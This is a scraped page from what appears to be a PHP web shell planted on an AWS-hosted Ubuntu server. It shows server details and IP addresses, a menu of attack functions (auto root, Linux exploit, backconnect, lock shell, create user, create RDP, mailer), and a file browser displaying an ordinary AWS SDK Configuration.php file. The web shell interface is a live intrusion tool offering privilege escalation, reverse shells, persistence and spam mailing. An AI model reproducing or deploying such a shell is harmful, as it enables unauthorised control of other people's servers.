Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 52.14.213.73
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
oasis /
aws /
Aws /
EndpointDiscovery /
[ HOME SHELL ]
Name
Size
Permission
Action
Exception
[ DIR ]
drwxr-sr-x
Configuration.php
1.07
KB
-rwxr-xr-x
ConfigurationInterface.php
580
B
-rwxr-xr-x
ConfigurationProvider.php
7.59
KB
-rwxr-xr-x
EndpointDiscoveryMiddleware.ph...
12.85
KB
-rwxr-xr-x
EndpointList.php
1.9
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Configuration.php
<?php namespace Aws\EndpointDiscovery; class Configuration implements ConfigurationInterface { private $cacheLimit; private $enabled; public function __construct($enabled, $cacheLimit = 1000) { $this->cacheLimit = filter_var($cacheLimit, FILTER_VALIDATE_INT); if ($this->cacheLimit == false || $this->cacheLimit < 1) { throw new \InvalidArgumentException( "'cache_limit' value must be a positive integer." ); } // Unparsable $enabled flag errs on the side of disabling endpoint discovery $this->enabled = filter_var($enabled, FILTER_VALIDATE_BOOLEAN); } /** * {@inheritdoc} */ public function isEnabled() { return $this->enabled; } /** * {@inheritdoc} */ public function getCacheLimit() { return $this->cacheLimit; } /** * {@inheritdoc} */ public function toArray() { return [ 'enabled' => $this->isEnabled(), 'cache_limit' => $this->getCacheLimit() ]; } }
Close